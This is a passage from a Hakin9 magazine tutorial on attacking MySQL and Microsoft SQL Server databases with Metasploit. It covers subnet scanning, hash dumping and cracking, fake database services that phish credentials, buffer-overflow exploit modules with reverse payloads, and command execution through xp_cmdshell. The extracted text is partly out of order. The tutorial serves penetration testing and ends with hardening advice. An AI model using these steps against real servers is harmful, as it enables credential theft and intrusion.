extracts the usernames and encrypted password hashes from a MySQL server. One can then use jtr_mysql_fast module to crack them. The module is located in auxiliary/scanner /mysql. To use it set RHOSTS option to our target’s IP address and increase THREADS value. If you have managed to reveal root password then set also options USERNAME and PASSWORD. Run the module to get your precious results! (Figure 11) mysql_hashdump
Cracking passwords with John The Ripper Metasploit offers module jtr_mysql_fast.This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_ hashdump module. John the Ripper is a free and Open Source software password cracker, available for many operating systems such as Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. After having acquired mysql hashes with mysql_hashdump module, load jtr_mysql_fast module and run it. use auxiliary/analyze/jtr_mysql_fast run
Figure 12. jtr_mysql_fast module options
Figure 13. mysql capture module options
www.hakin9.org/en
A database schema describes in a formal language the structure of the database, the organization of the data, how the tables, their fields and relationships between them must be defined and more. In general, database schema defines the way the database should be constructed. Metasploit has the module mysql_schemadump to get MySQL schema. mysql_schemadump is located under auxiliary/ scanner/mysql. To use it you have to set RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one hosts increase THREADS value!
Let’s go Phishing
Phishing is an attempt to steal sensitive information by impersonating a well known organization. In the same manner you can trick a user to steal her MySQL credentials. One of the abilities of Metasploit is this, mimic known services and capture user credentials. Among the various capture modules there is a module called mysql. This module provides a fake MySQL service that is designed to capture MySQL server authentication credentials. It captures challenge and response pairs that can be supplied to Cain or John the Ripper for cracking. To select the capture module type: use auxiliary/server/capture/mysql
This module offers some interesting options. You can set CAINPWFILE option to store captured hashes in Cain&Abel format or JOHNPWFILE to store hashes in John The Ripper format. Leave SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can also set the SRVVERSION option, which is the version of the mysql server that will be reported to clients in the greeting response. This option must agree with the true mysql server version on the network if you don’t want to being detected. You can also configure the module to use SSL! (Figure 13) Run the module and connect to the capture mysql server from another computer on the network to see how it is working. To connect to a mysql server open a terminal and type: mysql -h ip_address -u root -p
47
Hakin9 Exploitng Software
Enter any password, for now, in mysql’s prompt and see what is happening in Metasploit! (Figure 14) Metasploit has captured the hash and now this hash is stored in cain and john format in files /tmp/ john and /tmp/cain. These are the files that I have chosen. Cain Format root NULL 94e243cab3181cvef73852s3011651369196a928 112263447569708899agbbfcddneff2113434455
exploits a stack buffer overflow in the yaSSL 1.9.8 and earlier and mysql_yassl_ hello exploits a stack buffer overflow in the yaSSL 1.7.5 and earlier. To use any exploit you have to select it:
mysql_yassl_getname
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/mysql/mysql_yassl_hello use exploit/windows/mysql/mysql_yassl_hello
root:$mysqlna$1112263447569708899agbb fcddneff2113434455 * 94e243cab3181cvef73852s3011651369196a928
As you can figure, the last exploit is for windows systems. After selecting your desired exploit, you have to select the payload. Each exploit offers a variety of payloads. You have to choose the most suitable for your target. To see a list of available payloads for the exploit type (Figure 15):
MySQL Exploiting
show payloads
SHA1
John format
MySQL database system is a very secure piece of software. Metasploit doesn’t offer many MySQL exploits. Although some exploits exist. YaSSL Exploits YaSSL is a lightweight embedded SSL library. Metasploit offers 2 exploits for this library. The mysql_yassl_getname and the mysql_yassl_hello. The
Figure 14. mysql capture module in action
Figure 15. Exploit’s and payload’s options
The most successful exploits usually are the reverse _ tcp payloads where the target machine connects back to you. Each payload offers some options. By typing show options
you will see exploit’s and payload’s options (Figure 16). Other MySQL Exploits We should mention here two more exploits that are available for MySQL systems that run on Windows servers. The mysql_payload and the scrutinizer_ upload_exec. The first exploit, mysql_payload, creates and enables a custom UDF on the target. On default Microsoft Windows installations of MySQL 5.5.9 and earlier, directory write permissions are not enforced, and the MySQL service runs as LocalSystem. This module will leave a payload executable on the target system and the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions. The scrutinizer_upload_exec module exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer, a network traffic monitoring and analysis tool. By default, the software installs a default password in MySQL, and binds the service to “0.0.0.0”. This allows any remote user to login to MySQL, and then gain arbitrary remote code execution under the context of ‘SYSTEM’.
We are in! Figure 16. mysql_yassl_hello exploit payloads
48
And now what? Metasploit offers two modules that will assist you to enumerate a MySQL service or execute sql queries. All you need is a valid user-
02/2013
How to use Sqlploit
password pair. mysql_enum allows for simple enumeration of MySQL Database Server and mysql_sql allows for simple SQL statements to be executed against a MySQL instance. To select them, type: use auxiliary/admin/mysql/mysql_enum
and execute the command show options
to get a list of available options (Figure 17). To use mysql_sql execute (Figure 18): use auxiliary/admin/mysql/mysql_sql
and show options
Attacking a Microsoft SQL Server
The NMAP way To discover open MSSQL ports we execute the following command: nmap -sT -sV -Pn -p 1433 192.168.200.133
Usually administrators, when they need more than one instances of SQL server they run the second instance at port 1434. nmap -sT -sV -Pn -p 1433,1434 192.168.200.133
Parameters: -sT: TCP connect scan -sV: Determine Service version information -Pn: Ignore Host discovery -p 1433,1434: Scan port 1433 and 1434 Scanning the whole network
Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) used to store, retrieve and manage information. As with many Microsoft’s products, SQL Server has many security weaknesses. Let’s start by identifying running SQL servers on the network.
nmap -sT -sV -Pn -–open -p 1433,1434 192.168.200.0/24
Discover open MSSQL ports MSSQL is running by default on port 1433. To discover SQL Server you can use either nmap or Metasploit’s auxiliary module.
Metasploit offers auxiliary module mssql_ping. This module discovers running MSSQL services. To use it, type:
Figure 17. mysql_enum module options
Figure 19. mssql_ping module options
Figure 18. mysql_sql module options
Figure 20. mssql_ping module in action
www.hakin9.org/en
Parameters: --open: Show only open ports
The Metasploit way
49
Hakin9 Exploitng Software
use auxiliary/scanner/mssql/mssql_ping
Type: show options
for a list of available options (Figure 19). To discover all running MSSQL services on the net, set RHOSTS value equal to 192.168.200.0/24, assuming that your target network is in this range, increase threads value for a faster scanning and run the module (Figure 20).
Brute forcing MSSQL
Auxiliary module mssql_login is working in the same manner as mysql_login does. It will query the MSSQL instance for a specific username and password pair. The options for this module are: Figure 21. The default administratorâ&#x20AC;&#x2122;s username for SQL server is sa. In the options of this module, you can specify a specific password, or a password list, a username list or a username-password list where usernames and passwords are separated by space and each pair is in a new line. Having set your options simply run the module and wait for your results! You can create your own password list file, like we did in the first chapter where we used mysql_login module.
Dump MSSQL Password Hashes
extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking with jtr_mssql_
mssql_hashdump
fast. This module also saves information about the server version and table names, which can be used to seed the wordlist. The module is located in auxiliary/scanner/mssql. To use it set RHOSTS option to our targetâ&#x20AC;&#x2122;s ip address and increase THREADS value to 50. If you have managed to reveal root password then set also options USERNAME and PASSWORD. Run the module! (Figure 22).
Cracking mssql passwords with John The Ripper
Metasploit offers module jtr_mssql_fast. This module works in the same manner as jtr_mysql_fast does. It uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. After having acquire mssql encrypted hashes with mssql_hashdump module, load jtr_mssql_fast and run it. use auxiliary/analyze/jtr_mssql_fast
and run
You should set the Wordlist option which is the path to your desired password list (Figure 23).
Getting Microsoft SQL Server schema
Metasploit offers the module mssql_schemadump to retrieve MSSQL schema. mssql_schemadump is located under auxiliary/scanner/mssql. This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master,model,msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.To use it you have to set RHOSTS, USERNAME and PASSWORD options. If you are scanning more than one hosts increase the THREADS value to get results faster.
Figure 21. mssql_login options
Figure 22. mssql_hashdump module
50
Figure 23. jtr_mssql_fast module options
02/2013
How to use Sqlploit
Phishing with MSSQL
Metasploit has also a mssql capture module, called mssql. This module provides a fake MSSQL service that is designed to capture MSSQL server authentication credentials. The module supports both the weak encoded database logins as well as Windows login (NTLM). To select the capture module type: use auxiliary/server/capture/mssql
You can set CAINPWFILE option to store captured hashes in Cain&Abel format or JOHNPWFILE to store hashes in John The Ripper format. Leave SRVHOST option as it is, 0.0.0.0, to listen on the local host. You can configure the module to use SSL (Figure 24). Run the module and connect to the capture mssql server from another computer on the network to see how it is working. To connect to a mssql server open your Microsoft SQL Server management studio and try to login to the running service (Figure 25). Metasploit has captured the username and the password the user entered to login to the fake MSSQL service.
Exploiting the Microsoft world
Metasploit offers some MSSQL exploits. Let’s take a look. SQL Server 2000 SQL server 2000 is a very old version of Microsoft SQL Server and is hard to find it on Production environments nowdays. ms02_039_slammer exploits a resolution service buffer overflow. This overflow
is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. To select it for use simply type: use exploit/windows/mssql/ms02_039_slammer
Another exploit module for SQL Server 2000 is ms02 _ 056 _ hello. ms02 _ 056 _ hello is an exploit which will send malformed data to TCP port 1433 to overflow a buffer and possibly execute code on the server with SYSTEM level privileges. To select it, type: use exploit/windows/mssql/ms02_056_hello
SQL Server 2000 – SQL Server 2005 ms09_004_sp_replwritetovarbin and ms09_004_sp_ replwritetovarbin_sqli exploit a heap-based buffer overflow that occur when calling the undocumented “sp_replwritetovarbin” extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005. To use these exploits you type: use exploit/windows/mssql/ms09_004_sp_ replwritetovarbin
or use exploit/windows/mssql/ms09_004_sp_ replwritetovarbin_sqli
As with any Metasploit module, you can type show options
to get a list of available options (Figure 26). Type Figure 24. mssql capture module options
show payloads
Figure 25. Login attempt captured by mssql capture module
Figure 26. ms09_004_sp_replwritetovarbin_sqli module options
www.hakin9.org/en
51
Hakin9 Exploitng Software
to get a list of available of payloads for the selected exploit. SQL Server database systems Metasploit offers the module, exploit/windows/ mssql/mssql_payload, which executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure. Three delivery methods are supported. The original method uses Windows ‘debug.com’. Since this method invokes ntvdm, it is not available on x86_64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses ‘wcsript.exe’ to generate the executable on the target. Finally, ReL1K’s latest method utilizes PowerShell to transmit and recreate the payload on the target. Another interesting exploit module that can be applied in all SQL Server versions is the exploit/ windows/mssql/mssql_payload_sqli. This module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_ cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens. You should use a “reverse” payload on port 80 or to any other outbound port allowed on the firewall.
From inside
Metasploit offers various modules that will assist you to enumerate a MSSQL service, execute sql queries, retrieve useful data and many more. All
you need is a valid user-password pair. mssql_enum will perform a series of configuration audits and security checks against a Microsoft SQL Server database. mssql_sql and mssql_sql_file will allow for simple SQL statements to be executed against a MSSQL/MSDE or multiple SQL queries contained within a specified file. To select them, type: use auxiliary/admin/mssql/mssql_enum
or use auxiliary/admin/mssql/mssql_sql
or use auxiliary/admin/mssql/mssql_sql_file
and execute the following command to see the options (Figure 27) show options
Sample Data There is an amazing module called mssql_ findandsampledata. This module will search through all of the non-default databases on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS option. If column names are found that match the defined keywords and data is present in the associated tables, the module will select a sample of the records from each of the affected tables. You have to set the the sample size by configuring the SAMPLE_SIZE option. Your results will be stored in CSV format. Type use auxiliary/admin/mssql/mssql_findandsampledata
and show options
52
Figure 27. mssql_sql_file module options
Executing Windows Commands If you have managed to find a valid username – password pair, the most desired thing that you
Figure 28. mssql_findandsampledata module options
Figure 29. mssql_idf module options
02/2013
How to use Sqlploit
would like to do is to execute a command on the compromised machine. Metasploit offers module auxiliary/admin/mssql/mssql_exec which will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. All you need is the username and password!!
guarded by firewalls, use encryption and powerfull passwords and the whole system (database and operating system) must be checked every day for new updates and upgrades. The best choice would be to allow access to your database only from your intranet and/or vpn. Try not to expose your database directly to the web. Close all your database system ports now!
Data mining If you need to search for specific information in SQL Server databases there is a module that can make your life easier. Its name, mssql_idf, and you will find it under auxiliary/admin/mssql/. This module will search the specified MSSQL server for ‘interesting’ columns and data. The module is working against SQL Server 2005 and SQL Server 2008 (Figure 29).
George Karpouzas
George Karpouzas is the co-founder and owner of WEBNETSOFT, a Software development, Computers security and IT services company in Greece. He is working as a software developer for the past seven years. He is a penetration tester, security researcher, information security consultant and software developer at WEBNETSOFT. He holds a bachelor’s of science in computer science from Athens University of Economics and Business. You can find the answers to any security questions on his blog http:// securityblog.gr.
Conclusion
Databases are the most important part of today’s computing systems. They usually contain all the information needed to run a company or organization. Therefore it is necessary to be as safe as possible. Metasploit framework is just one tool of many out there, that offers the appropriate scripts to compromise a database system. Databases are software that must be accessed by applications running on the Internet, that’s why they must be a
www.hakin9.org/en
d
v
e
r
t
i
s
e
m
e
n
t
53